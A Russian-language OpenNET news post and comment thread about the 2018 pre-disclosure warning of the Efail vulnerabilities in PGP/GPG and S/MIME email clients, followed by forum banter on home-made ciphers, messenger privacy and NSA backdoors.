The OpenNET Project / Index page

[ новости/++ | форум | wiki | теги | ]



"Критическая уязвимость в системах шифрования email на основе..."
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от opennews on 14-Май-18, 11:03 
Себастьян Шинцель (Sebastian Schinzel (https://sebastian-schinzel.de/)), авторитетный немецкий эксперт по компьютерной безопасности (один из авторов атаки DROWN (https://www.opennet.ru/opennews/art.shtml?num=43971)), предупредил (https://twitter.com/seecurity/status/995906576170053633) о выявлении критических уязвимостей в системах шифрования почтовой переписки, основанных на  использовании PGP/GPG и S/MIME. Проблемы позволяют определить исходный открытый текст шифрованных писем, в том числе отправленных ранее зашифрованных писем. В настоящее время доступно лишь общее предупреждение, детали будут раскрыты 15 мая в 7 утра (UTC).

Правозащитная организация Electronic Frontier Foundation (EFF)
подтвердила (https://www.eff.org/deeplinks/2018/05/attention-pgp-users-ne...), что выявленные уязвимости относятся к разряду наиболее критических проблем и представляют серьёзных риск для пользователей шифрованных коммуникаций по электронной почте, особенно так как проблемы позволяют получить доступ к содержимому ранее отправленных зашифрованных сообщений. Судя по отрывочным сведениям, уязвимости напрямую не затрагивают PGP/GPG и S/MIME, а проявляются в конечных решениях на базе данных систем для почтовых клиентов из-за функций автоматической расшифровки.


Утверждается, что надёжно работающих исправлений проблем пока не существует, поэтому пользователям PGP/GPG и S/MIME предлагается отключить в почтовых клиентах инструменты, поддерживающие автоматическую расшифровку сообщений. До формирования исправлений пользователям предлагается временно прекратить использование PGP для отправки и приёма писем и воспользоваться альтернативными каналами  обмена шифрованными сообщениями, такими как Signal. Инструкции по отключению PGP/GPG и S/MIME подготовлены для Thunderbird с Enigmail (https://www.eff.org/deeplinks/2018/05/disabling-pgp-thunderb...), Apple Mail c GPGTools (https://www.eff.org/deeplinks/2018/05/disabling-pgp-apple-ma...) и Outlook c Gpg4win (https://www.eff.org/deeplinks/2018/05/disabling-pgp-outlook-...).

URL: https://www.eff.org/deeplinks/2018/05/attention-pgp-users-ne...
Новость: https://www.opennet.ru/opennews/art.shtml?num=48596

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения по теме [Сортировка по времени | RSS]


1. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Онвоним on 14-Май-18, 11:03 
Зачем альтернативные каналы и signal? Просто отключить автоматическую расшифровку, и делать это руками.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

5. "Критическая уязвимость в системах шифрования email на основе..."  +2 +/
Сообщение от Онанимус on 14-Май-18, 11:08 
Таки да! Тем более не понятна связь между автоматической расшифровкой и уязвимостью зашифровки.
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

10. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Онвоним on 14-Май-18, 11:34 
Я предполагаю, что уязвимость - это сохранение почтовым клиентом исходного незашифрованного сообщения перед отправкой в черновиках. Черновик в исходном виде может передаваться серверу. И если история переписки в черновиках хранятся на почтовом сервере - то можно восстанавливать оригиналы. Клиент может периодически сохранять черновик ещё не отправленного письма.
Наблюдал такое, но пока со связкой K-9 (с OpenKeychain). Но то Android.

Соответственно, шифруем сообщение, кладём armored-текст в письмо, и расшифровываем в обратном порядке при получении.

Ответить | Правка | ^ к родителю #5 | Наверх | Cообщить модератору

31. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Онанимус on 14-Май-18, 12:08 
> Я предполагаю, что уязвимость - это сохранение почтовым клиентом исходного незашифрованного сообщения перед отправкой в черновиках.

IMAP? Но в таком случае, уязвим трафик до IMAP сервера. Дальше то письмо идет шифрованное. А в анонсе говорится о глобальной уязвимости.

Ответить | Правка | ^ к родителю #10 | Наверх | Cообщить модератору

2. "Критическая уязвимость в системах шифрования email на основе..."  –10 +/
Сообщение от лютый охохонюшка on 14-Май-18, 11:05 
А ведь неломаемое шифрование изобрели ещё при царе Горохе, одноразовые шифр-блокноты называется. В наши времена дешевого стораджа вообще халявка, сгенерил 4ГБ рэндома и хватит на всю жизнь + на аудиоразговоры.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

4. "Критическая уязвимость в системах шифрования email на основе..."  +3 +/
Сообщение от Кир on 14-Май-18, 11:07 
... и наградил всех счастливых потенциальных корреспондентов гигабайтами мусора ...
Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

6. "Критическая уязвимость в системах шифрования email на основе..."  +13 +/
Сообщение от Креативные инноваторы on 14-Май-18, 11:08 
повод съездить друг к другу в гости, да
Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

105. "Критическая уязвимость в системах шифрования email на основе..."  +2 +/
Сообщение от angra (ok) on 14-Май-18, 21:08 
И как тебе эти блокноты помогут в ситуации, когда уязвимость не в самом механизме методе шифрования или ключе, а в взаимодействии клиентского софта с этим механизмом? Или ты новость не читал?
Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

3. "Критическая уязвимость в системах шифрования email на основе..."  +8 +/
Сообщение от Креативные инноваторы on 14-Май-18, 11:06 
Настало время создавать логотип, логотип сам себя не создаст.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

11. "Критическая уязвимость в системах шифрования email на основе..."  –2 +/
Сообщение от Andrey Mitrofanov on 14-Май-18, 11:36 
> Настало время создавать логотип, логотип сам себя не создаст.

Дыкыть анонса-то не было ещё.  Это слухи-утечки, подогревающие интерес покупателей к.  До 15-го заинтересованные микрософты подгонят ребятам денежек и на логотип, и на погоняло креатифное, и на титульный сайт в зоне .com (.cypher? .bug? .info?  .app!??  --  где по-взрослому-то? чтоб подороже!).

Ща, погодь, всё будет.

+++!"простые ошибки в СПО" & "получают имена собственные, эмблемы и пр." http://www.opennet.ru/openforum/vsluhforumID3/105391.html#15

Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

13. "Критическая уязвимость в системах шифрования email на основе..."  +1 +/
Сообщение от Аноним (??) on 14-Май-18, 11:37 
по итогам, новость выеденного яйца не стоит
Ответить | Правка | ^ к родителю #11 | Наверх | Cообщить модератору

15. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Andrey Mitrofanov on 14-Май-18, 11:40 
> и на погоняло креатифное,

" Проблемам присвоено имя Efail. "

Я прочитал наверху, да.  //IMNSHO лучше б денег подождали -- чего покреативнее приду ^W купили б.

Ответить | Правка | ^ к родителю #11 | Наверх | Cообщить модератору

18. "Критическая уязвимость в системах шифрования email на основе..."  –1 +/
Сообщение от Аноним (??) on 14-Май-18, 11:43 
cTLD .apple ещё не занята ...
Эппл её хрен отсудит, так как можно сказать, что она для продавцов и культиваторов яблоневых саженцев, но зато они могут её заблочить в гейфонах.
Ответить | Правка | ^ к родителю #11 | Наверх | Cообщить модератору

73. "Критическая уязвимость в системах шифрования email на основе..."  –1 +/
Сообщение от Вареник on 14-Май-18, 17:11 
И озаботиться рассово-половым составом команды разрабов.
Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

7. "Критическая уязвимость в системах шифрования email на основе..."  +3 +/
Сообщение от Аноним (??) on 14-Май-18, 11:23 
https://lists.gnupg.org/pipermail/gnupg-users/2018-May/06031...
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

32. "Уффффф!"  +1 +/
Сообщение от Andrey Mitrofanov on 14-Май-18, 12:08 
> https://lists.gnupg.org/pipermail/gnupg-users/2018-May/06031...

Акхр... "HTML mails" + "автоматическое [рас]шифровывание".

Расходимся, пацаны!

--- Сегодня в нашем сикьюритэ циркусе:
?Те, кто меняют безопасность на удобство, не получат ни того ни другого.?
?Удобная "безопасность" небезопасна.  Неудобная тоже.  Проверенная -- не факт.  Проверенная лично -- безопасна, может быть.  Проверенная лично, ежедневно и ${нужное-неизвестное вписать!} -- весьма вероятно, но недолго.?

Ответить | Правка | ^ к родителю #7 | Наверх | Cообщить модератору

103. "Уффффф!"  –1 +/
Сообщение от Аноним (??) on 14-Май-18, 21:03 
>Use authenticated encryption.

Кто-то ещё юзает unauthenticated encryption?

Ответить | Правка | ^ к родителю #32 | Наверх | Cообщить модератору

8. "Критическая уязвимость в системах шифрования email на основе..."  –10 +/
Сообщение от Онаним email on 14-Май-18, 11:27 
В очередной раз убеждаюсь: хочешь сделать хорошо - сделай это сам. Систему шифрования для своего бизнеса - изучи вопрос, и пиши сам.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

9. "Критическая уязвимость в системах шифрования email на основе..."  +16 +/
Сообщение от sabakka on 14-Май-18, 11:32 
люди годами не могут сделать, онаним запилит все за пару недель.
Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

12. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Аноним (??) on 14-Май-18, 11:36 
делается ставка на неуловимого Джо
Ответить | Правка | ^ к родителю #9 | Наверх | Cообщить модератору

16. "Критическая уязвимость в системах шифрования email на основе..."  +14 +/
Сообщение от pull request on 14-Май-18, 11:42 
Первое правило криптографии - никогда не придумывай свою систему криптографии.
Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

23. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Ivan_83 (ok) on 14-Май-18, 11:54 
забыл авторство АНБ указать :)
Ответить | Правка | ^ к родителю #16 | Наверх | Cообщить модератору

104. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Аноним (??) on 14-Май-18, 21:05 
> забыл авторство АНБ указать :)

Интересно служил ли Брюс Шнайер в АНБ?

Ответить | Правка | ^ к родителю #23 | Наверх | Cообщить модератору

108. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Аноним (??) on 14-Май-18, 21:13 
> Интересно служил ли Брюс Шнайер в АНБ?

Вроде бы нет. Но как минимум пару своих же алгоритмов он более не рекомендует, а еще один советует в основном как основу алгоритма хэширования, а не крипто в чистом виде. Но он свои алгоритмы честно оценивает и знает наихучшие атаки, фигли.

Ответить | Правка | ^ к родителю #104 | Наверх | Cообщить модератору

27. "Критическая уязвимость в системах шифрования email на основе..."  +3 +/
Сообщение от Аноним (??) on 14-Май-18, 11:56 
С этим правилом никакой криптографии бы не было.
Ответить | Правка | ^ к родителю #16 | Наверх | Cообщить модератору

36. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Andrey Mitrofanov on 14-Май-18, 12:33 
>никакой криптографии бы не

Никакой фантазии у людей.

Ответить | Правка | ^ к родителю #27 | Наверх | Cообщить модератору

124. "Критическая уязвимость в системах шифрования email на основе..."  –1 +/
Сообщение от konst55512 on 15-Май-18, 01:31 
Есть фантазии.
Самый безопасный метод общения между мной и В.Пупкиным такой:
используй собственный вариант гав-но-шифровки, типа: tr/abc/cba/.
Это реально работающий метод. Не один бот не расшифрует.
А вот если всяким там ЦРУ/АНБ/ФСБ захочется мою переписку расшифровать, они не станут задействоать НИИ и проч., а используют безотказный паяльник. Дешевле и быстрее.
Именно поэтому не вижу смысла с создании супер-алгоритмов шифрования.

Ответить | Правка | ^ к родителю #36 | Наверх | Cообщить модератору

125. "Критическая уязвимость в системах шифрования email на..."  +/
Сообщение от arisu (ok) on 15-Май-18, 01:44 
> типа: tr/abc/cba/.
> Это реально работающий метод. Не один бот не расшифрует.

лолушки. вот и Профессионалы Криптоанализа пожаловали. эти ваши гуаношифры как раз и ломаются *автоматически*. и нет, волшебные слова «я знаю про фестеля и сделал свой с-бокс!» тоже не спасут. всё ещё автоматически.

Ответить | Правка | ^ к родителю #124 | Наверх | Cообщить модератору

127. "Критическая уязвимость в системах шифрования email на..."  +/
Сообщение от konst55512 on 15-Май-18, 03:20 
>> типа: tr/abc/cba/.
>> Это реально работающий метод. Не один бот не расшифрует.
> лолушки. вот и Профессионалы Криптоанализа пожаловали. эти ваши гуаношифры как раз и
> ломаются *автоматически*. и нет, волшебные слова «я знаю про фестеля и
> сделал свой с-бокс!» тоже не спасут. всё ещё автоматически.

Вы категоррически не правы (imho).
Я говорил о том, что расшифровать tr/abc/bca/ способен только И ТОЛЬКО тот, кто этого очень хочет. А простые боты используют стандартные способы расшифровки (известные уязвимости).
А 2-е мое утверждение, которое не подлежит оспору, - это то, что если кому-то очень-очень захочется узнать, что же я написал Василию Пупкину сумеет сделать это гораздо менее затратно, чем догадавшись сделать tr/bca/abc/.

Ответить | Правка | ^ к родителю #125 | Наверх | Cообщить модератору

128. "Критическая уязвимость в системах шифрования email на..."  +/
Сообщение от arisu (ok) on 15-Май-18, 10:27 
я не знаю, что такое «простые боты», и какое они отношение имеют к шифрованию. впрочем, защищаться от воображаемых атакующих — дело приятное и даже иногда прибыльное.
Ответить | Правка | ^ к родителю #127 | Наверх | Cообщить модератору

131. "Критическая уязвимость в системах шифрования email на..."  +/
Сообщение от Аноним (??) on 16-Май-18, 00:33 
> Я говорил о том, что расшифровать tr/abc/bca/ способен только И ТОЛЬКО тот,
> кто этого очень хочет. А простые боты используют стандартные способы расшифровки

Криптография она как осетрина - бывает только первой свежести. Второй сорт - таки уже тухлятина.

> (известные уязвимости).

В случае известных 0day не поможет даже лучшая криптография. Информационная безопасность штука сложная, комплексная.

Ответить | Правка | ^ к родителю #127 | Наверх | Cообщить модератору

45. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от rshadow (ok) on 14-Май-18, 13:10 
Итальянская забастовка: делать все _абсолютно в точности_ написанным правилам.
Ответить | Правка | ^ к родителю #27 | Наверх | Cообщить модератору

66. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Аноним (??) on 14-Май-18, 15:07 
Именно поэтому правила криптографии появились уже после появления криптографии.
Ответить | Правка | ^ к родителю #27 | Наверх | Cообщить модератору

34. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Andrey Mitrofanov on 14-Май-18, 12:23 
> Первое правило криптографии - никогда не придумывай свою систему криптографии.

" If you think technology can solve your security problems, then you don't understand the problems and you don't understand the technology. " --Bruce Schneier

" Anyone, from the most clueless amateur to the best cryptographer, can create an algorithm that he himself can't break. " --Bruce Schneier

" The user's going to pick dancing pigs over security every time. " --Bruce Schneier

//https://duckduckgo.com/?q=Bruce+Schneier+cryptograpy+securit...

Ответить | Правка | ^ к родителю #16 | Наверх | Cообщить модератору

39. "Критическая уязвимость в системах шифрования email на основе..."  –1 +/
Сообщение от pkdr (ok) on 14-Май-18, 12:48 
Если бы так думали все, то до сих пор бы шифровали решётками, как у Жюля Верна или человечками, как у Конан Дойла.
Ответить | Правка | ^ к родителю #16 | Наверх | Cообщить модератору

48. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от unxed on 14-Май-18, 13:26 
А вот использовать индустриальный стандарт одновременно со своей криптографией это правило не запрещает. Или запрещает?

Больше бдительности! Недостаточно паранойи!

А вообще страшилки про дыры АНБ в алгоритмах как-то не сходятся с тем, что биткойны на тех же алгоритмах вполне надёжно крутятся, и никакие бывшие сотрудники АНБ на дырах не обогащаются. Или обогащаются, потихоньку списывая с кошельков, по которым годами не было транзакций? ;-)

Ответить | Правка | ^ к родителю #16 | Наверх | Cообщить модератору

62. "Критическая уязвимость в системах шифрования email на основе..."  –1 +/
Сообщение от Аноним84701 (ok) on 14-Май-18, 14:53 
> А вообще страшилки про дыры АНБ в алгоритмах как-то не сходятся с тем, что биткойны на тех же алгоритмах вполне надёжно крутятся, и никакие бывшие сотрудники АНБ на дырах не обогащаются.

Все верно, ведь все-все дыры во всех-всех алгоритмах (причем сразу со сплойтами и прочим) доступны  каждому сотруднику, без подписи десятка бумажек и обещания ана^W различных кар в случае утечки …


Ответить | Правка | ^ к родителю #48 | Наверх | Cообщить модератору

72. "Критическая уязвимость в системах шифрования email на основе..."  +2 +/
Сообщение от kk (??) on 14-Май-18, 17:01 
анальные карты очень наверное страшны когда на кону тысячи биткоинов
ну что вы в самом деле
Ответить | Правка | ^ к родителю #62 | Наверх | Cообщить модератору

74. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Аноним84701 (ok) on 14-Май-18, 17:13 
> анальные карты очень наверное страшны когда на кону тысячи биткоинов ну что вы в самом деле

Зато обосновывать отсутствие дыр в алгоритмах тем, что бывшие сотрудники АНБ не попались на уводе биткоинов совсем не "в самом деле"?
Если исходить из шпионских рома^W^W логики, то доступ к таким вещам всегда будет у довольно ограниченного количества людей. И в особо сильную текучку кадров и наличие кучи откровенных дураков там как-то не сильно верится.  
В свою очередь, в этом случае эти бывшие сотрудники вполне себе осознают возможности родной  конторы (и того, что вычисляются они, скорее всего, только влет). А там все равно биткоины отберут и в места не столь отдаленные отправят.
Ну или они просто не попадаются, да -- доказать это вы тоже не можете ;)

Ответить | Правка | ^ к родителю #72 | Наверх | Cообщить модератору

113. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Anonimous on 14-Май-18, 21:31 
> анальные карты очень наверное страшны когда на кону тысячи биткоинов

полагаю, что в спецслужбах как в мафии: "анальные карты" за серьезный проступок приводят к тому, что даже тело оступившегося будет невозможно найти. Т.е с "анала" кары только начнутся, а не закончатся. Вы сильно переоцениваете значение денег.


Ответить | Правка | ^ к родителю #72 | Наверх | Cообщить модератору

65. "Критическая уязвимость в системах шифрования email на основе..."  +1 +/
Сообщение от Ан (??) on 14-Май-18, 15:07 
Боюсь, на бизнесс времени не останется =) А если все и получится, то придут вежливые люди и попросят изменить алгоритм на гост и попутно отдать ключи
Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

14. "Критическая уязвимость в системах шифрования email на основе..."  –7 +/
Сообщение от Andrew (??) on 14-Май-18, 11:37 
99% пользователей имеют очень отдаленное представление о механизмах безопасности электронной почты, тем более, что речь идет о шифровании всего сообщения, а не только прикрепленных файлов. если OpenPGP еще кто-то использует, то S/MIME вообще для многих неведома зверушка. так что оба стандарта могут быть кривыми и косыми, никого это не коснется. и вообще хороший повод задуматься о том, что электронная почта это ископаемое из 70-80х годов 20 века, которое давно не отвечает современным требованиям.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

17. "Критическая уязвимость в системах шифрования email на основе..."  +1 +/
Сообщение от Аноним (??) on 14-Май-18, 11:43 
Ископаемое, согласен. Но что на замену?
Ответить | Правка | ^ к родителю #14 | Наверх | Cообщить модератору

20. "Критическая уязвимость в системах шифрования email на основе..."  –6 +/
Сообщение от Аноним (??) on 14-Май-18, 11:52 
очевидный телеграм очевиден
Ответить | Правка | ^ к родителю #17 | Наверх | Cообщить модератору

25. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Ivan_83 (ok) on 14-Май-18, 11:56 
телеграм и сигнал пусть идут по дальше, такие проекты ущемляющие свободы пользователей и их приватность.
Ответить | Правка | ^ к родителю #20 | Наверх | Cообщить модератору

28. "Критическая уязвимость в системах шифрования email на основе..."  –9 +/
Сообщение от Аноним (??) on 14-Май-18, 11:57 
> телеграм и сигнал пусть идут по дальше, такие проекты ущемляющие свободы пользователей
> и их приватность.

Сигнал да, но телеграм борется за свободы пользователей и их приватность.

Ответить | Правка | ^ к родителю #25 | Наверх | Cообщить модератору

33. "Критическая уязвимость в системах шифрования email на основе..."  +11 +/
Сообщение от Вы забыли заполнить поле Name on 14-Май-18, 12:12 
Насмешил. Дуруов и Ко борются за свои денюшки и делают пиар для таких как ты.
Ответить | Правка | ^ к родителю #28 | Наверх | Cообщить модератору

38. "Критическая уязвимость в системах шифрования email на основе..."  –1 +/
Сообщение от Crazy Alex (ok) on 14-Май-18, 12:47 
Насколько я понимаю, у них одно другому не мешает - но это пока противоречия нет. Ну и свободы и приватность - тоже разные вещи. Вон, Эппл довольно агрессивно защищает приватность (а перед ним блекберри долго держался) - но свободы там ни капли.
Ответить | Правка | ^ к родителю #33 | Наверх | Cообщить модератору

46. "Критическая уязвимость в системах шифрования email на основе..."  +1 +/
Сообщение от rshadow (ok) on 14-Май-18, 13:13 
> у них одно другому не мешает

Так себе утверждение. Пиарили-то серетные чаты, которыми никто не пользуется. А оказалось все как всегда.

Ответить | Правка | ^ к родителю #38 | Наверх | Cообщить модератору

47. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Аноним (??) on 14-Май-18, 13:23 
Говори только за себя.
Ответить | Правка | ^ к родителю #46 | Наверх | Cообщить модератору

50. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от unxed on 14-Май-18, 13:33 
Наличие секретных чатов при доступности не секретных само по себе свидетельство в пользу того, что человеку есть что скрывать.

Гранты за уязвимости в алгоритмах доказывают только то, что уязвимости стоят дороже этих грантов.

Если я, условный телеграм-барыга, знаю, что взятка ментам дешевле уязимости (использование которой одноразово), я могу спать спокойно.

Но в сравнении с теми же биткойнами, надёжность которых подтверждена кругленькими хранимыми суммами, гранты Дурова выглядят смешно.

Ответить | Правка | ^ к родителю #47 | Наверх | Cообщить модератору

51. "Критическая уязвимость в системах шифрования email на основе..."  +1 +/
Сообщение от Аноним (??) on 14-Май-18, 13:48 
Эти ваши бетховены никем не признанные фантики.
Ответить | Правка | ^ к родителю #50 | Наверх | Cообщить модератору

129. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от unxed on 15-Май-18, 13:29 
Какая разница, пока их можно обменять на кем-то признанные фантики.
Ответить | Правка | ^ к родителю #51 | Наверх | Cообщить модератору

76. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Crazy Alex (ok) on 14-Май-18, 17:28 
Нормальное утверждение. Получать прибыль с пользовательской базы не обязательно рекламой или продажей личной информации, можно и поинтереснее штуки придумать. Дуров в этом плане придумал вполне неплохо.

Продают они сейчас TON - свою (будущую) крипту. Ежу ясно, что у них и достаточно ресурсов, чтобы эту штуку сделать и достаточная пользовательская база, её хорошо раскрутить, если она будет хотя бы не хуже прочих. И получить МНОГО - сравнимо с eth, пожалуй. В миллиардах, сотнях миллионов как минимум. При этом морочить голову со слежкой и подобным банально смысла нет - не окупится. Поэтому полагаю, что пока им таки выгодна приватность пользователей. Что будет дальше - а там будет видно. По идее надёжность их штуковины будет и в дальнейшем её плюсом. Плюс Дуров - вполне известный либертарианец.

Ответить | Правка | ^ к родителю #46 | Наверх | Cообщить модератору

80. "Критическая уязвимость в системах шифрования email на основе..."  +1 +/
Сообщение от Andrey Mitrofanov on 14-Май-18, 17:41 
>При этом морочить голову со слежкой и
> подобным банально смысла нет - не окупится. Поэтому полагаю, что пока
> им таки выгодна приватность пользователей.

Морочить голову надо _отсутствием_ слежки, _гарантированным_ отсутствием на уровне математики, а не то, что Вы написали...

Ответить | Правка | ^ к родителю #76 | Наверх | Cообщить модератору

81. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Andrey Mitrofanov on 14-Май-18, 17:44 
>_гарантированным_ отсутствием на уровне математики,

Ещё неплохо заморочиться _гарантированным_ {из,у}беганием {,от} угроз на уровне государств, айбиэмов-фейсбуков-микросовтов и рептилоидов...

> а не то, что Вы написали...

Ответить | Правка | ^ к родителю #80 | Наверх | Cообщить модератору

84. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Crazy Alex (ok) on 14-Май-18, 17:59 
Кому-то надо, а кому-то и нет. Что за манера решать за других, что им нужно (и чем они за это должны платить)?

Допустим, если я с кем-то договариваюсь купить пару биткоинов за (вполне легально полученный) кэш мне хотелось бы, чтобы местный криминал это не узнал с понятными последствими. А вот узнает об этом Дуров или нет - мне побоку, так как крайне сомнительно, чтобы он с местной гопотой сотрудничал.

Если барышня высылает кому-то свои фоточки ню - она, вероятно, не хочет, чтобы они попали в общий доступ, но, опять же, АНБ для неё вряд ли представляет опасность. В будущем может проявить интерес, конечно, но вероятность исчезающе мала.

Когда муж пишет жене, забывшей ключ "запасной лежит под третьей справа черепицей от курятника" - та же ситуация. А такой бытовухи - абсолютное большинство.

Ответить | Правка | ^ к родителю #80 | Наверх | Cообщить модератору

58. "Критическая уязвимость в системах шифрования email на основе..."  +2 +/
Сообщение от Ivan_83 (ok) on 14-Май-18, 14:25 
Огрызок интенсивно пеарится, как и все американские сервисы.
Их цель - создать видимость что они не сотрудничают и не сливают данные хомяков в АНБ, но я этому никогда не поверю, потому что АНБ гарантирует им жирные гос контракты и крышу, есть там и просто патриоты на уровне нашей ваты.
Ответить | Правка | ^ к родителю #38 | Наверх | Cообщить модератору

75. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Crazy Alex (ok) on 14-Май-18, 17:20 
Кто там что им гарантирует - это уже фантазии пошли. Не то, чтобы этого быть не могло, но на аргумент не тянет. А вот противоположные примеры вполне известны.

Ну а пиарятся абсолютно все вменяемые организации - хоть коммерческие, хоть за идэю. Кто не пиарится - тот дохнет :-)

Ответить | Правка | ^ к родителю #58 | Наверх | Cообщить модератору

91. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Ivan_83 (ok) on 14-Май-18, 18:23 
Как маленький.
А госы ихние по твоему что маки и венду не покупают?
Это самое очевидное.
Из не очевидного всякие инвестиционные фонды, но тут я и не писал ничего, хотя и предполагаю что они тоже льют баблом, у них там из бывших силовиков дохрена народу где в верхах.
Ответить | Правка | ^ к родителю #75 | Наверх | Cообщить модератору

57. "Критическая уязвимость в системах шифрования email на основе..."  +3 +/
Сообщение от Ivan_83 (ok) on 14-Май-18, 14:22 
Любой централизованный месенгер никогда не даст никаких свобод, пользователь для владельцев таких систем всегда товар/ресурс, который используется для извлечения выгоды.
К владельцам таких систем всегда будут приходить люди с полномочиями и получать всё что им нужно.
Это неизбежно, это всё заложено сразу в систему, кто бы что там не декларировал.
Даже если месенгер типа е2е то он всегда знает кто с кем когда и сколько переписывался, это уже слишком много.

Борьба телеги - это сплошной пеар, они всегда так на халяву пеарились, с самого начала.
Если бы им реально было интересно свобода и приватность - они бы превратились в аналог токса, а пока они привязаны к мобиле и своим серверам - грош им цена.

Ответить | Правка | ^ к родителю #28 | Наверх | Cообщить модератору

79. "Критическая уязвимость в системах шифрования email на основе..."  +/
Сообщение от Crazy Alex (ok) on 14-Май-18, 17:37 
Ну я вот не представляю, как можно сделать надёжный, удобный и не особо жручий P2P-сервис для "простых людей" с достаточным количеством модных плюшек. И живых примеров тоже не видать. Скорее вссего, будет как везде - на одном конце шкалы "секьюрно, неудобно и для понимающих", на другом "несекьюрно, зато с плюшками и для любой блондинки". В этом плане телеграм занял довольно вменяемую промежуточную позицию - и просто, и достаточно безопасно, чтобы той же наркотой там торговали.

А насчёт " всегда знает кто с кем когда и сколько переписывался, это уже слишком много" - это, в общем-то, вопрос личных предпочтений. Можно с тем же SSL сравнить - гарантирует безопасность? Нет. Но прилично удорожает атаку и защищает от всяких мелких "умников" - от тупого снифа до обнаглевшего ОПСОСа, пытающегося рекламу пихать.

А насчёт "всегда ресурс" - я там выше отвечал. Ресурс - это одно, как именно его использовать - другое.

Ответить | Правка | ^ к родителю #57 | Наверх | Cообщить модератору

82. "Критическая уязвимость в системах шифрования email на..."  +/
Сообщение от arisu (ok) on 14-Май-18, 17:45 
потому что не надо ничего такого делать для «простых людей». если человек не понимает, что безопасность не может работать без его участия и понимания — он всегда найдёт способ обойти все меры безопасности и облажаться. а любая попытка сделать меры «менее обходимыми» заранее обречена: неудобно будет *всем*.

зато продавать (в том или ином виде, лучше всего неявно) «простым людям» «готовые решения для безопасности» — отличный лохотрон. ради чего, собственно, весь хайп с «безопасностью» и раскручивали.

Ответить | Правка | ^ к родителю #79 | Наверх | Cообщить модератору

83. "Критическая уязвимость в системах шифрования email на..."  +/
Сообщение от Crazy Alex (ok) on 14-Май-18, 17:50 
Ну я ж даже примеры привёл с SSL и наркотой - оно вполне прилично защищает от примитивных угроз или атак с малыми ресурсами. Которых, в общем-то, большинство. Можно даже обнаглеть и сказать, что для того, кому нет нужды в безопасности разбираться, других угроз и не бывает.
Ответить | Правка | ^ к родителю #82 | Наверх | Cообщить модератору

86. "Критическая уязвимость в системах шифрования email на..."  +/
Сообщение от arisu (ok) on 14-Май-18, 18:09 
для того, от чего «защищает» ssl — он сильно переусложнён. а мелкие наркоторговцы просто никому нафиг не нужны, для них (грубо говоря) и rot13 пойдёт: всем лень. а когда не лень, то отлично берут мозолистой рукой — как раз из-за того, что эти торговцы совершенно не умеют в безопасность. хуже того: не просто не умеют, а считают, что они в безопасности, потому что применяют «безопасные решения».

профанация безопасности (утверждение, что нечто «безопасно», хотя оно не) — это очень, очень плохо. потому что делает внедрение нормальной безопасности сложным почти до невозможности. пользователь *не* *понимет*, и «аргументирует» примерно так: «да что ты мне тут рассказываешь! сами XYZ говорят, что у них всё безопасно! а у них милионные обороты, они точно в этом понимают больше, чем ты!» криптографов такие люди читать не станут (иначе они бы *уже* прочитали), и понимать аргументы не могут в силу необразованости. в итоге внедрение «немножко безопасных» вещей ХУЖЕ, чем полный отказ от них.

Ответить | Правка | ^ к родителю #83 | Наверх | Cообщить модератору

92. "Критическая уязвимость в системах шифрования email на..."  +1 +/
Сообщение от Ordu email(ok) on 14-Май-18, 18:36 
> пользователь *не* *понимет*, и «аргументирует» примерно так: «да что ты мне тут рассказываешь! сами XYZ говорят, что у них всё безопасно! а у них милионные обороты, они точно в этом понимают больше, чем ты!»

Естественно. Я бы тоже так сказал.

> криптографов такие люди читать не станут (иначе они бы *уже* прочитали), и понимать аргументы не могут в силу необразованости.

